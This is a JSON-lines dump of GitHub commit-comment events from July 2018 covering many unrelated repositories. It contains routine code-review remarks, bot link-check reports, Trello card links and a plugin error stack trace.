{"id":"8003917701","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29800256,"position":1,"line":1,"path":"src/sha1mac.c","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T13:30:50Z","updated_at":"2018-07-23T13:30:50Z","author_association":"CONTRIBUTOR","body":"Actually all the files included in this commit are already deleted."}},"created_at":"2018-07-23T13:30:50Z"}
{"id":"8003918179","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29800257,"position":32,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T13:30:55Z","updated_at":"2018-07-23T13:30:55Z","author_association":"CONTRIBUTOR","body":"On peut garder ça pour l'instant et aviser quand on implementera les déplacements dans ce cas"}},"created_at":"2018-07-23T13:30:55Z"}
{"id":"8003918673","type":"CommitCommentEvent","actor":{"login":"olysonek"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29800259,"position":24,"line":24,"path":"tests/hardware/test_device_matcher_udev.py","commit_id":"fddb10eb47946abecf715e1371bd46385f11058e","created_at":"2018-07-23T13:31:00Z","updated_at":"2018-07-23T13:31:00Z","author_association":"NONE","body":"Also, the convention in Tuned is to use tabs for indentation, not spaces."}},"created_at":"2018-07-23T13:31:00Z"}
{"id":"8003923074","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29800265,"position":null,"line":null,"path":null,"commit_id":"e36b07f01d39c71b61463097fb412c523f38e7bc","created_at":"2018-07-23T13:31:45Z","updated_at":"2018-07-23T13:31:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-104](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-104).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-104-next50.pantheonsite.io/)"}},"created_at":"2018-07-23T13:31:45Z"}
{"id":"8003923404","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29800267,"position":null,"line":null,"path":null,"commit_id":"91dfc2d57841bb45eabc2ab94c6907c40f1b9948","created_at":"2018-07-23T13:31:48Z","updated_at":"2018-07-23T13:31:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Network errors](https://trello.com/c/sLFQnasp/6-network-errors)"}},"created_at":"2018-07-23T13:31:48Z"}
{"id":"8003926241","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29800273,"position":null,"line":null,"path":null,"commit_id":"2f1bfd5a7aabcedb593248b4c48abb81cafec24f","created_at":"2018-07-23T13:32:17Z","updated_at":"2018-07-23T13:32:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Logout support](https://trello.com/c/XzMqmH4I/9-logout-support)"}},"created_at":"2018-07-23T13:32:17Z"}
{"id":"8003930013","type":"CommitCommentEvent","actor":{"login":"PhilippeBo"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29800283,"position":null,"line":null,"path":null,"commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-23T13:32:54Z","updated_at":"2018-07-23T13:32:54Z","author_association":"NONE","body":"Tu n'as pas testé ton `Organizer` qui est censé envoyer les deux mails 👎 "}},"created_at":"2018-07-23T13:32:54Z"}
{"id":"8003934893","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29800304,"position":null,"line":null,"path":null,"commit_id":"91dfc2d57841bb45eabc2ab94c6907c40f1b9948","created_at":"2018-07-23T13:33:43Z","updated_at":"2018-07-23T13:33:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Followers and following tab](https://trello.com/c/SgKvG3cy/7-followers-and-following-tab)"}},"created_at":"2018-07-23T13:33:43Z"}
{"id":"8003938575","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29800312,"position":null,"line":null,"path":null,"commit_id":"2f1bfd5a7aabcedb593248b4c48abb81cafec24f","created_at":"2018-07-23T13:34:21Z","updated_at":"2018-07-23T13:34:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Followers and following tab](https://trello.com/c/SgKvG3cy/7-followers-and-following-tab)"}},"created_at":"2018-07-23T13:34:21Z"}
{"id":"8003939271","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29800314,"position":null,"line":null,"path":null,"commit_id":"581b48a90cee885b8a0c5fb2fc1cd7427ebc000c","created_at":"2018-07-23T13:34:28Z","updated_at":"2018-07-23T13:34:28Z","author_association":"COLLABORATOR","body":"The reasoning behind commenting out GlassBR is actually related to issue #891; in order to get to the discrepancy logs, GlassBR cannot be built at the moment. This change was supposed to be just on my machine, but upon using the `-a` flag in the when `commit`ting, the change propagated to the repo as well so it had to be reverted since looking at the error is a high priority. "}},"created_at":"2018-07-23T13:34:28Z"}
{"id":"8003940133","type":"CommitCommentEvent","actor":{"login":"kimyoungchan1"},"repo":{"name":"kimyoungchan1/web"},"payload":{"comment":{"id":29800319,"position":null,"line":null,"path":null,"commit_id":"c47c7e77ebbf836745fbff81ba2a335eb8a76c68","created_at":"2018-07-23T13:34:37Z","updated_at":"2018-07-23T13:34:37Z","author_association":"OWNER","body":"A home page in HTML"}},"created_at":"2018-07-23T13:34:37Z"}
{"id":"8003940444","type":"CommitCommentEvent","actor":{"login":"0yedediqizhang0"},"repo":{"name":"0yedediqizhang0/mygit"},"payload":{"comment":{"id":29800321,"position":null,"line":null,"path":null,"commit_id":"c8a5abb15224d803fb51e206f335d87aec997c88","created_at":"2018-07-23T13:34:40Z","updated_at":"2018-07-23T13:34:40Z","author_association":"OWNER","body":"fenci"}},"created_at":"2018-07-23T13:34:40Z"}
{"id":"8003941149","type":"CommitCommentEvent","actor":{"login":"hschweitzer"},"repo":{"name":"hschweitzer/AniList-Plus"},"payload":{"comment":{"id":29800324,"position":null,"line":null,"path":null,"commit_id":"82e42791657f64b44e9d46930a297cdaf495cd66","created_at":"2018-07-23T13:34:47Z","updated_at":"2018-07-23T13:34:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fix première visite](https://trello.com/c/sb3fGQml/3-fix-premi%C3%A8re-visite)"}},"created_at":"2018-07-23T13:34:47Z"}
{"id":"8003941811","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29800327,"position":null,"line":null,"path":null,"commit_id":"2f1bfd5a7aabcedb593248b4c48abb81cafec24f","created_at":"2018-07-23T13:34:54Z","updated_at":"2018-07-23T13:34:54Z","author_association":"OWNER","body":"Also update namings of tabs"}},"created_at":"2018-07-23T13:34:54Z"}
{"id":"8003946220","type":"CommitCommentEvent","actor":{"login":"debugtalk"},"repo":{"name":"HttpRunner/HttpRunner"},"payload":{"comment":{"id":29800334,"position":null,"line":null,"path":null,"commit_id":"705df59ca17b91713887027ed04e96632703f74d","created_at":"2018-07-23T13:35:35Z","updated_at":"2018-07-23T13:35:35Z","author_association":"COLLABORATOR","body":"fix #284"}},"created_at":"2018-07-23T13:35:35Z"}
{"id":"8003946770","type":"CommitCommentEvent","actor":{"login":"TiagoSantos81"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29800336,"position":58,"line":293,"path":"languagetool-language-modules/en/src/main/resources/org/languagetool/resource/en/hunspell/spelling_en-US.txt","commit_id":"507df1b2c8e79b69f1e58b925d743de7bf6babf4","created_at":"2018-07-23T13:35:40Z","updated_at":"2018-07-23T13:35:40Z","author_association":"MEMBER","body":"Are those standard English?\r\nhttps://www.merriam-webster.com/dictionary/opiod\r\nhttp://www.dictionary.com/misspelling?term=opiod&s=t"}},"created_at":"2018-07-23T13:35:40Z"}
{"id":"8003947151","type":"CommitCommentEvent","actor":{"login":"Knium"},"repo":{"name":"Knium/knicc"},"payload":{"comment":{"id":29800339,"position":53,"line":53,"path":"map.c","commit_id":"18cd699081647954716090cb185fbf0dd62a6fdb","created_at":"2018-07-23T13:35:43Z","updated_at":"2018-07-23T13:35:43Z","author_association":"OWNER","body":"`assert`にする"}},"created_at":"2018-07-23T13:35:43Z"}
{"id":"8003951424","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29800347,"position":null,"line":null,"path":null,"commit_id":"28db5f10107fd139e68fc53cfb7be3f2508a49e6","created_at":"2018-07-23T13:36:25Z","updated_at":"2018-07-23T13:36:25Z","author_association":"NONE","body":"Comment on 28db5f10107fd139e68fc53cfb7be3f2508a49e6.\n\nThere are 11 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Snake_case | _projects/use_coala_2.md | 127 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | data/locale/en/projects/gitmate_plugins.md | 39 |\n| Broken link - unable to connect to https://choosealicense.com/ | data/locale/en/projects/add_repo_license.md | 133 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 6 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | data/locale/en/projects/use_coala_3.md | 200 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | data/locale/en/projects/use_coala_3.md | 203 |\n| Broken link - unable to connect to https://docs.google.com/spreadsheets/d/1qMUsupzK30MaM79Jnq8N9ZitZgG2g7ae08Q-f8ExTDQ/edit | _projects/use_coala.md | 186 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | _projects/use_coala.md | 487 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-lint-no-trailing-spaces | _projects/extend_linter_integration.md | 135 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | data/locale/en/projects/use_coala_2.md | 272 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/student_obligations.md | 6 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-23T13:36:25Z"}
{"id":"8003954831","type":"CommitCommentEvent","actor":{"login":"jannes-m"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29800359,"position":null,"line":null,"path":null,"commit_id":"0044994085f7f52b4e46917ba5c88fb04649bbea","created_at":"2018-07-23T13:36:59Z","updated_at":"2018-07-23T13:36:59Z","author_association":"COLLABORATOR","body":"👍 "}},"created_at":"2018-07-23T13:36:59Z"}
{"id":"8003966413","type":"CommitCommentEvent","actor":{"login":"bueltge"},"repo":{"name":"pluginkollektiv/antispam-bee"},"payload":{"comment":{"id":29800377,"position":6,"line":1851,"path":"antispam_bee.php","commit_id":"c11166fb1293636fc5f383bb49e05386f356144c","created_at":"2018-07-23T13:38:57Z","updated_at":"2018-07-23T13:38:57Z","author_association":"MEMBER","body":"lecker, wo ist die denn dokumentiert?"}},"created_at":"2018-07-23T13:38:57Z"}
{"id":"8003968355","type":"CommitCommentEvent","actor":{"login":"Nikvt"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29800380,"position":null,"line":null,"path":null,"commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-23T13:39:16Z","updated_at":"2018-07-23T13:39:16Z","author_association":"OWNER","body":"Je voulais te demander si je le tester ou pas, puis je me suis dit que c'est inutile. C'est la même chose que de lancer les 2 autres testes...\r\nJe vais le rajouter ^^"}},"created_at":"2018-07-23T13:39:16Z"}
{"id":"8003973659","type":"CommitCommentEvent","actor":{"login":"websupporter"},"repo":{"name":"pluginkollektiv/antispam-bee"},"payload":{"comment":{"id":29800391,"position":6,"line":1851,"path":"antispam_bee.php","commit_id":"c11166fb1293636fc5f383bb49e05386f356144c","created_at":"2018-07-23T13:40:13Z","updated_at":"2018-07-23T13:40:13Z","author_association":"MEMBER","body":":laughing: not yet documented. @krafit did the pluginkollektiv.org side of things here."}},"created_at":"2018-07-23T13:40:13Z"}
{"id":"8003979088","type":"CommitCommentEvent","actor":{"login":"vchtelmakh"},"repo":{"name":"crdschurch/crds-form-builder-frontend"},"payload":{"comment":{"id":29800400,"position":26,"line":22,"path":"src/app/services/vm-manager/vm-manager.service.ts","commit_id":"5bea697ceb695f169ae35a975d23cf83764750ec","created_at":"2018-07-23T13:41:07Z","updated_at":"2018-07-23T13:41:07Z","author_association":"COLLABORATOR","body":"I removed this log."}},"created_at":"2018-07-23T13:41:07Z"}
{"id":"8003986438","type":"CommitCommentEvent","actor":{"login":"asilbek2shavkatov"},"repo":{"name":"asilbek2shavkatov/htmll"},"payload":{"comment":{"id":29800410,"position":1,"line":1,"path":"README.md","commit_id":"f6e225fb0d6f2021f29c5c9a0cc431ad573916a9","created_at":"2018-07-23T13:42:20Z","updated_at":"2018-07-23T13:42:20Z","author_association":"OWNER","body":"fgg\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-23T13:42:20Z"}
{"id":"8003989044","type":"CommitCommentEvent","actor":{"login":"Abubakarharuna10"},"repo":{"name":"Abubakarharuna10/Python-programming-exercises"},"payload":{"comment":{"id":29800415,"position":null,"line":null,"path":null,"commit_id":"a266ec5a2980fbfda21456d6c0f050cec064e340","created_at":"2018-07-23T13:42:47Z","updated_at":"2018-07-23T13:42:47Z","author_association":"OWNER","body":"100 Python-programming-exercises"}},"created_at":"2018-07-23T13:42:47Z"}
{"id":"8003992278","type":"CommitCommentEvent","actor":{"login":"chrislatorres"},"repo":{"name":"webmixedreality/webmr-docs"},"payload":{"comment":{"id":29800421,"position":5,"line":8,"path":"docs/Support.md","commit_id":"ffc8b3c44b7a9e38723e1a465860ecf8d133f0a3","created_at":"2018-07-23T13:43:20Z","updated_at":"2018-07-23T13:43:20Z","author_association":"MEMBER","body":"ac419d5 "}},"created_at":"2018-07-23T13:43:20Z"}
{"id":"8003996881","type":"CommitCommentEvent","actor":{"login":"Nikvt"},"repo":{"name":"Nikvt/Articles-front-for-api"},"payload":{"comment":{"id":29800490,"position":12,"line":12,"path":"spec/interactors/mail_to_comment_receiver_spec.rb","commit_id":"45e97261505e26ddcb046ae16b566a1f6408855e","created_at":"2018-07-23T13:44:07Z","updated_at":"2018-07-23T13:44:07Z","author_association":"OWNER","body":"Le test ne passe pas si je remplace => par :"}},"created_at":"2018-07-23T13:44:07Z"}
{"id":"8004002127","type":"CommitCommentEvent","actor":{"login":"erfanio"},"repo":{"name":"unihackhq/handbook"},"payload":{"comment":{"id":29800526,"position":22,"line":27,"path":"docs/melbourne/event-information/communication.md","commit_id":"2fb981ebd8b9a181155c444b17d20a1c2227eb91","created_at":"2018-07-23T13:45:00Z","updated_at":"2018-07-23T13:45:00Z","author_association":"MEMBER","body":"Definitely on slack. We don't have time to add anything to the app."}},"created_at":"2018-07-23T13:45:00Z"}
{"id":"8004010094","type":"CommitCommentEvent","actor":{"login":"rofl0r"},"repo":{"name":"mserneels/twatscrape"},"payload":{"comment":{"id":29800543,"position":10,"line":16,"path":"twat.py","commit_id":"9f562dd666a24e3f9894fa897748b2e8ac6335bc","created_at":"2018-07-23T13:46:20Z","updated_at":"2018-07-23T13:46:20Z","author_association":"NONE","body":"i guess we could just use http.parse_url()"}},"created_at":"2018-07-23T13:46:20Z"}
{"id":"8004012587","type":"CommitCommentEvent","actor":{"login":"idodin"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29800551,"position":null,"line":null,"path":null,"commit_id":"7bf7caf196f7c08113ca7d26e64e461645952a36","created_at":"2018-07-23T13:46:44Z","updated_at":"2018-07-23T13:46:44Z","author_association":"MEMBER","body":"Can use the hours kwarg to construct a timedelta object with a value of 2 hours. Make sure notifications are serialized into the db in case the bot crashes before they can be issued. "}},"created_at":"2018-07-23T13:46:44Z"}
{"id":"8004022452","type":"CommitCommentEvent","actor":{"login":"LilianSmirnova"},"repo":{"name":"LilianSmirnova/Test-"},"payload":{"comment":{"id":29800580,"position":null,"line":null,"path":null,"commit_id":"c9a9f8303598cd829a0df6d1070fe02de07dd1bc","created_at":"2018-07-23T13:48:23Z","updated_at":"2018-07-23T13:48:23Z","author_association":"OWNER","body":"first  commit"}},"created_at":"2018-07-23T13:48:23Z"}
{"id":"8004026429","type":"CommitCommentEvent","actor":{"login":"rofl0r"},"repo":{"name":"mserneels/twatscrape"},"payload":{"comment":{"id":29800585,"position":8,"line":30,"path":"twat.py","commit_id":"5f67eb2011273984a1e3b61f1615b348005f85ee","created_at":"2018-07-23T13:49:01Z","updated_at":"2018-07-23T13:49:01Z","author_association":"NONE","body":"does that leave the original URLs inside the tweet ?"}},"created_at":"2018-07-23T13:49:01Z"}
{"id":"8004028623","type":"CommitCommentEvent","actor":{"login":"bueltge"},"repo":{"name":"pluginkollektiv/antispam-bee"},"payload":{"comment":{"id":29800586,"position":6,"line":1851,"path":"antispam_bee.php","commit_id":"c11166fb1293636fc5f383bb49e05386f356144c","created_at":"2018-07-23T13:49:22Z","updated_at":"2018-07-23T13:49:22Z","author_association":"MEMBER","body":"Oh, sad. We should not dev inside the background."}},"created_at":"2018-07-23T13:49:22Z"}
{"id":"8004032650","type":"CommitCommentEvent","actor":{"login":"AtaMuhiuldin"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29800595,"position":null,"line":null,"path":null,"commit_id":"dc232e1ccefa26e4f200b153a32e6f66f5a02fc0","created_at":"2018-07-23T13:50:03Z","updated_at":"2018-07-23T13:50:03Z","author_association":"OWNER","body":"Good Work"}},"created_at":"2018-07-23T13:50:03Z"}
{"id":"8004037251","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29800607,"position":null,"line":null,"path":null,"commit_id":"4b3fab649ee3c2da4ade142ae953ed6b2aa4a9a8","created_at":"2018-07-23T13:50:48Z","updated_at":"2018-07-23T13:50:48Z","author_association":"OWNER","body":"Collision 679.1.4~680.10.1"}},"created_at":"2018-07-23T13:50:48Z"}
{"id":"8004040718","type":"CommitCommentEvent","actor":{"login":"barakus89"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29800617,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T13:51:23Z","updated_at":"2018-07-23T13:51:23Z","author_association":"NONE","body":"I agree with everyone. The project is very promising. The video on YouTube is pretty clear, everything explains and is done qualitatively which already speaks volumes about the project."}},"created_at":"2018-07-23T13:51:23Z"}
{"id":"8004041069","type":"CommitCommentEvent","actor":{"login":"johngf"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29800618,"position":null,"line":null,"path":null,"commit_id":"82ef710fbd095473c2c40bf0b18c6a89de8129b4","created_at":"2018-07-23T13:51:27Z","updated_at":"2018-07-23T13:51:27Z","author_association":"COLLABORATOR","body":"t'as oublié .py"}},"created_at":"2018-07-23T13:51:27Z"}
{"id":"8004044300","type":"CommitCommentEvent","actor":{"login":"litodertechie"},"repo":{"name":"litodertechie/rails_listy"},"payload":{"comment":{"id":29800627,"position":null,"line":null,"path":null,"commit_id":"649b951bf7b7e2b33e0a57667c55cfb331726168","created_at":"2018-07-23T13:51:59Z","updated_at":"2018-07-23T13:51:59Z","author_association":"OWNER","body":"Wow I just saw your commit! I am incredibly grateful :)\r\n\r\nI just started programming and want to create a social network where people can create lists e.g \"My favourite movies\", \"My Favourite Books\" and people can follow one another to get inspired. Can we stay in touch in case I run into a problem? "}},"created_at":"2018-07-23T13:51:59Z"}
{"id":"8004044655","type":"CommitCommentEvent","actor":{"login":"thepiwo"},"repo":{"name":"aeternity/elixir-node"},"payload":{"comment":{"id":29800629,"position":null,"line":null,"path":null,"commit_id":"c48a801171c159ac8dd38305e6d30c0f7064e5e9","created_at":"2018-07-23T13:52:02Z","updated_at":"2018-07-23T13:52:02Z","author_association":"COLLABORATOR","body":"good configuration (cc @nedelcho-delchev-tues @cheezus1 )"}},"created_at":"2018-07-23T13:52:02Z"}
{"id":"8004056901","type":"CommitCommentEvent","actor":{"login":"Boccialex"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29800651,"position":14,"line":118,"path":"app/src/main/java/com/example/android/pets/data/PetContract.java","commit_id":"6861be56c0c5c3673f0a0b8a04922bfee823582b","created_at":"2018-07-23T13:53:59Z","updated_at":"2018-07-23T13:53:59Z","author_association":"NONE","body":"@ayush251196 \r\nWithout the isValid () method I got an error, because I stored gender as a string but then I recall it as an integer (for the validation purpose)\r\n"}},"created_at":"2018-07-23T13:53:59Z"}
{"id":"8004059993","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29800655,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-23T13:54:29Z","updated_at":"2018-07-23T13:54:29Z","author_association":"NONE","body":"@sgdc3 Got 2 issues with your fork, compiled as of commit https://github.com/CodeMC/HolographicDisplays/commit/3a5aa2da3469fedf611e786694e0ca7a76847fef.\r\n\r\nGot a message saying it was unable to spawn the entity?\r\n```\r\n[06:45:55] [Server thread/WARN]: [HolographicDisplays] Coulnd't spawn entity for this hologram: NamedHologram [name=zombiespawners, super=CraftHologram [world=CraftWorld{name=spawn}, x=183.3, y=13.5, z=86.718, lines=[CraftTextLine [text=• Zombie Spawners •]], deleted=false]]\r\n```\r\n\r\nBroke compatibility with HolographicExtensions?\r\n```\r\n[06:43:32] [Server thread/INFO]: [HolographicExtension] Enabling HolographicExtension v1.9.2\r\n[06:43:32] [Server thread/ERROR]: Error occurred while enabling HolographicExtension v1.9.2 (Is it up to date?)\r\njava.lang.NoClassDefFoundError: com/gmail/filoghost/holographicdisplays/util/MinecraftVersion\r\n\tat com.appletec.holograms.HolographicExtension.onEnable(HolographicExtension.java:87) ~[?:?]\r\n\tat org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:264) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat org.bukkit.plugin.java.JavaPluginLoader.enablePlugin(JavaPluginLoader.java:316) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:405) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.CraftServer.enablePlugin(CraftServer.java:395) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat org.bukkit.craftbukkit.v1_12_R1.CraftServer.enablePlugins(CraftServer.java:344) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat net.minecraft.server.v1_12_R1.MinecraftServer.t(MinecraftServer.java:442) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat net.minecraft.server.v1_12_R1.MinecraftServer.l(MinecraftServer.java:403) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat net.minecraft.server.v1_12_R1.MinecraftServer.a(MinecraftServer.java:341) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat net.minecraft.server.v1_12_R1.DedicatedServer.init(DedicatedServer.java:289) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat net.minecraft.server.v1_12_R1.MinecraftServer.run(MinecraftServer.java:616) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat java.lang.Thread.run(Thread.java:748) [?:1.8.0_181]\r\nCaused by: java.lang.ClassNotFoundException: com.gmail.filoghost.holographicdisplays.util.MinecraftVersion\r\n\tat java.net.URLClassLoader.findClass(URLClassLoader.java:381) ~[?:1.8.0_181]\r\n\tat org.bukkit.plugin.java.PluginClassLoader.findClass(PluginClassLoader.java:156) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat org.bukkit.plugin.java.PluginClassLoader.findClass(PluginClassLoader.java:104) ~[patched_1.12.2.jar:git-Paper-1509]\r\n\tat java.lang.ClassLoader.loadClass(ClassLoader.java:424) ~[?:1.8.0_181]\r\n\tat java.lang.ClassLoader.loadClass(ClassLoader.java:357) ~[?:1.8.0_181]\r\n\t... 12 more\r\n[06:43:32] [Server thread/INFO]: [HolographicExtension] Disabling HolographicExtension v1.9.2\r\n```"}},"created_at":"2018-07-23T13:54:29Z"}
{"id":"8004060344","type":"CommitCommentEvent","actor":{"login":"kannadhasank"},"repo":{"name":"FunkyOz/light-autocomplete"},"payload":{"comment":{"id":29800658,"position":null,"line":null,"path":null,"commit_id":"98373a62d15aa9f9f69e48bd42bdfdc1f3b36aab","created_at":"2018-07-23T13:54:33Z","updated_at":"2018-07-23T13:54:33Z","author_association":"NONE","body":"how can i read a response data.i have set of json data in my response but in dot notation i cant achive.\r\ncan you share your skype id so that i will explain my issue\r\n"}},"created_at":"2018-07-23T13:54:33Z"}
{"id":"8004062673","type":"CommitCommentEvent","actor":{"login":"daskreativ"},"repo":{"name":"restrictcontentpro/restrict-content-pro"},"payload":{"comment":{"id":29800663,"position":null,"line":null,"path":null,"commit_id":"a45fcf197acad4392c1457c321147791657159f6","created_at":"2018-07-23T13:54:55Z","updated_at":"2018-07-23T13:54:55Z","author_association":"NONE","body":"Why did you change that? \r\nnow it is not working with newer composer/installers version"}},"created_at":"2018-07-23T13:54:55Z"}
{"id":"8004067908","type":"CommitCommentEvent","actor":{"login":"t-zuehlsdorff"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29800673,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-23T13:55:37Z","updated_at":"2018-07-23T13:55:37Z","author_association":"NONE","body":"You are welcome :)\r\nSadly i just noticed last week, that the chance was committed to 7.1 and 7.2. Now both versions are broken at FreeBSD.\r\n\r\nDo you think that it will break more if i just patch this out? :D"}},"created_at":"2018-07-23T13:55:37Z"}
{"id":"8004073275","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29800677,"position":12,"line":12,"path":"omod/src/main/java/org/openmrs/module/msfcore/ControllerService.java","commit_id":"5f25d1f5d29251a37202318cafeaca4e7f3e0eec","created_at":"2018-07-23T13:56:22Z","updated_at":"2018-07-23T13:56:22Z","author_association":"COLLABORATOR","body":"tested at: https://github.com/jembi/openmrs-module-msfcore/pull/1/commits/42701faa0782bdc3aa4100f615254abbb13ebeb5#diff-4600702ed7f62e081fab2573fb497f83R66"}},"created_at":"2018-07-23T13:56:22Z"}
{"id":"8004074332","type":"CommitCommentEvent","actor":{"login":"Rohit1310"},"repo":{"name":"Rohit1310/Getting-and-Cleaning-Data-final-Project"},"payload":{"comment":{"id":29800679,"position":null,"line":null,"path":null,"commit_id":"a17d1a8fa3d149a3c07c7bfffd2f57d17c9c312f","created_at":"2018-07-23T13:56:31Z","updated_at":"2018-07-23T13:56:31Z","author_association":"OWNER","body":"Updated the CodeBook"}},"created_at":"2018-07-23T13:56:31Z"}
{"id":"8004074420","type":"CommitCommentEvent","actor":{"login":"dvmorozov"},"repo":{"name":"dvmorozov/expenses"},"payload":{"comment":{"id":29800680,"position":null,"line":null,"path":null,"commit_id":"4660bd24dbfaec19a8864d275808497f455d6f8b","created_at":"2018-07-23T13:56:32Z","updated_at":"2018-07-23T13:56:32Z","author_association":"OWNER","body":"#17 "}},"created_at":"2018-07-23T13:56:32Z"}
{"id":"8004078208","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29800690,"position":58,"line":293,"path":"languagetool-language-modules/en/src/main/resources/org/languagetool/resource/en/hunspell/spelling_en-US.txt","commit_id":"507df1b2c8e79b69f1e58b925d743de7bf6babf4","created_at":"2018-07-23T13:57:08Z","updated_at":"2018-07-23T13:57:08Z","author_association":"CONTRIBUTOR","body":"Hi @TiagoSantos81, no, they aren't. Thanks for noticing. Fixed (https://github.com/languagetool-org/languagetool/commit/287b9ac5c0604226c65264c1c3449f8450d992f6)."}},"created_at":"2018-07-23T13:57:08Z"}
{"id":"8004082121","type":"CommitCommentEvent","actor":{"login":"bharathkumar-u"},"repo":{"name":"bharathkumar-u/bharathlabs"},"payload":{"comment":{"id":29800698,"position":null,"line":null,"path":null,"commit_id":"40e0a606d9a7ef2c4d90c36f84bf597549dd90ad","created_at":"2018-07-23T13:57:46Z","updated_at":"2018-07-23T13:57:46Z","author_association":"OWNER","body":"dfsdsgagsgsgsg"}},"created_at":"2018-07-23T13:57:46Z"}
{"id":"8004088165","type":"CommitCommentEvent","actor":{"login":"IppouTsuukou"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29800708,"position":null,"line":null,"path":null,"commit_id":"caf545127b49d783e0e821e9b5da67c26e00e9c5","created_at":"2018-07-23T13:58:41Z","updated_at":"2018-07-23T13:58:41Z","author_association":"MEMBER","body":"is this automate or a mistake?"}},"created_at":"2018-07-23T13:58:41Z"}
